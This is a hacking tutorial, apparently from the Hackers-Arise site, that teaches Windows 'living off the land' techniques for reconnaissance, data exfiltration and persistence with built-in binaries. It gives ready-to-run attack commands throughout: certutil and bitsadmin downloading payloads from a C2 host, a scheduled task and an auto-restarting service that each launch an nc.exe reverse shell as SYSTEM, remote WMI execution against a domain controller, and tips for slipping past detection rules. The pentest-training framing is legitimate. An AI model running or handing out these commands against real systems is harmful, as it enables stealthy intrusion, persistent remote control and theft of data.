Welcome back, aspiring cyberwarriors!
A while ago, we introduced the idea of Living off the Land and looked at several built-in Windows binaries that can be abused to execute commands, load code, or inject DLLs into running processes. One of the more subtle techniques we touched on was the creation of new drivers. While this is not a new idea, it often blends in surprisingly well. Modern Windows systems already contain a large number of legitimate drivers, and a carefully placed one is unlikely to stand out during a quick inspection. The key lesson here is restraint. Staying within the normal behavior and boundaries of the operating system is often more effective than trying to be overly creative. In many cases, the simplest approach is also the quietest.
In this part, we move on to three practical pillars of Living off the Land: network reconnaissance, data exfiltration, and persistence. Together, these cover most of what is needed for real-world operations. There are, of course, far more advanced techniques that offer higher levels of stealth and sophistication, but they also require deeper expertise and are useful only in very specific situations. Even experienced pentesters rarely rely on them during everyday engagements.
Our goal here is practicality. We focus on approaches that are easy to remember, quick to apply, and based on tools and behaviors that already exist on a standard Windows system. By avoiding overly complex syntax and exotic tricks, you gain techniques that are more likely to be used correctly under pressure. If you want to go deeper into persistence on Windows, including both common and more advanced methods, you can explore our Basic and Advanced Persistence series, where these topics are covered in greater detail.
Network Recon and Exfiltration
With these binaries you can perform some basic recon and exfiltrate files.
certutil.exe
One of the most useful binaries for both downloading and moving data is certutil.exe. Microsoft designed this tool to manage certificates and convert file formats, but its functionality can be repurposed to download various files.
Here, we are downloading a Base64 payload and then saving it as an executable:
PS > certutil.exe -urlcache -split -f "http://c2/payload.b64" "temp.b64" & certutil -decode "temp.b64" "staged.exe"
You can also host files on a compromised Windows machine and exfiltrate them:
PS > certutil.exe -urlcache -split -f “http://target:443/passwords.txt” “passwords.txt”
This approach is more stealthy than the well-known Invoke commands.
bitsadmin.exe
This tool relies on the Background Intelligent Transfer Service, or BITS, which is normally used by Windows Update and administrators to move files quietly in the background without disrupting network performance.
When downloading files, you can make your traffic look like update traffic:
PS > bitsadmin.exe /transfer StealthJob /download /priority normal http://C2/enum.exe C:\Temp\enum.exe
It then starts downloading the file.
The command we entered creates a BITS job named StealthJob that downloads enum.exe to C:\Temp from our C2 server.
net.exe
When it comes to reconnaissance, few tools are as useful and as familiar as net.exe. System administrators rely on it for everyday tasks, and that familiarity works in our favor. With simple commands, it is possible to enumerate network shares, query domain users, and gather information about the environment. If defenders are filtering or monitoring the net command specifically, its lesser-known twin, net1.exe, can often be used instead. Functionally, the two behave the same, but net1 is sometimes overlooked by basic detection rules.
View shares on a remote computer:
PS > net view HOST
View domain user information:
PS > net1 user Administrator /domain
nltest.exe
For more targeted Active Directory discovery, nltest.exe is what you need. This tool is intended to query domain controllers and test trust relationships. It does so without generating the kind of noise associated with aggressive scanning. Since the domain controller sits at the heart of any Active Directory environment, you need to identify it early.
Determine the DC name:
PS > nltest.exe /dsgetdc:dc.local
The results show the name and IP address of the domain controller. If the domain name is unknown, systeminfo will usually reveal it. With this information, you can now use tools like Impacket or NXC. Tools such as PowerView.py also require the domain controller’s name or its IP address.
ping.exe
Even something as basic as ping.exe has value beyond its obvious purpose. While administrators use it to test connectivity, it can also serve as a crude timing mechanism or even a basic beacon. In environments where systems are powered down aggressively after an incident, a host that periodically sends a ping can signal when it is back online and ready to be accessed again. In previous articles, we discussed how ping can be abused as a substitute for a sleep command by looping requests to localhost. With sufficient privileges, creative use of ping can even be wrapped into a service and turned into a persistence mechanism.
Here is another plain example:
PS > ping.exe -n 60 127.0.0.1 > null.txt
Persistence
These tools create mechanisms that restart or re-run commands later.
schtasks.exe
Scheduled tasks are a classic example. They are old, well understood, and heavily used by both the operating system and third-party software. Because of this, they provide excellent cover. A scheduled task can be triggered on a timer, at logon, or in response to specific system events. This flexibility makes it easy to hide malicious execution among legitimate tasks. An attacker might schedule a reverse shell to run periodically, or delay execution for weeks to outlast an incident response effort. While task creation is logged and relatively easy to monitor, many environments generate so many scheduled tasks that individual entries are rarely scrutinized closely.
Here is an example from our Basic Windows Persistence article:
PS > schtasks /create /ru SYSTEM /sc MINUTE /MO 1 /tn persistence /tr “C:\tmp
c.exe -e C:\windows\system32\cmd.exe 192.168.56.103 9001”
You can also schedule an executable:
PS > schtasks /create /tn "Update Service" /tr "C:\Windows\update.exe" /sc hourly /mo 5 /ru System
The first command registers a scheduled task named “persistence” that runs every minute as SYSTEM, executing nc.exe to spawn a reverse shell. The second one named “Update Service” runs a fake update.exe with the same SYSTEM privileges.
sc.exe
Services provide another persistence option. Using sc.exe, it is possible to create a new Windows service that runs automatically at boot. With enough privileges, an attacker can register a service that looks like routine system maintenance or installer activity. By configuring failure actions, the service can be set to restart automatically if it crashes, ensuring continued execution. Keep in mind, Windows logs service creation events.
Although the same can be done with PowerShell, there are some caveats. We will use CMD for it instead:
C:\ > sc create persistence binPath= "nc.exe ‐e \windows\system32\cmd.exe C2 9001" start= auto
C:\ > sc failure persistence reset= 0 actions= restart/60000/restart/60000/restart/60000
C:\ > sc start persistence
Here you create a service called persistence that runs nc.exe to connect to your C2 on boot (start= auto). The failure command sets it to restart three times after failing, waiting 60 seconds between attempts.
wmic.exe
While commonly used to query system information, it can also be used to execute processes remotely through WMI. This makes it useful for lateral movement once files have already been transferred to another host. When permissions allow it, WMI execution blends into normal administrative behavior, especially in environments where remote management is common.
PS > wmic.exe /node:"dc" process call create "cmd.exe /c C:\Temp\service.bat"
Here it connects to the domain controller (dc) and asks WMI to create a process that runs service.bat.
File Tools
These binaries are used to collect, compress, and move files.
forfiles.exe
The tool is typically used for maintenance tasks such as log cleanup, but can be abused to execute commands against matching files.
PS > forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c C:\Windows\System32\calc.exe"
This finds notepad.exe in System32 and runs calc.exe for each match. You can use it to hide processes in native system binaries.
robocopy.exe
Administrators rely on it for backups and file synchronization, which makes it a good choice for exfiltration during tests or attacks. When Robocopy copies entire directory trees or mirrors network shares, its behavior looks exactly like legitimate administrative work. It often blends into the background noise of normal operations.
PS > robocopy.exe \\manager-1\Documents C:\Sync /E
Here it mirrors the Documents share on Manager-1 to C:\Temp\Sync. /E makes it copy empty directories as well.
Summary
Windows ships with a rich set of signed binaries that administrators depend on every day. When those same tools are abused, they can bypass simple allowlists and signature-based defenses. This forces defenders to shift their focus from individual events to behavior and context. With modest privileges, an attacker can perform reconnaissance, establish persistence and exfiltrate data with very few new artifacts on the system. Tracing this activity is difficult, especially in environments where logging is incomplete or inconsistently deployed.
If you want to learn how PowerShell can be used in both red team and blue team scenarios, we recommend signing up for our training taking place from March 10 to 12, 2026. It will be available to both Subscriber and Subscriber Pro students.
Source: HackersArise
Source Link: https://hackers-arise.com/powershell-for-hackers-survival-edition-part-4-flying-under-the-radar/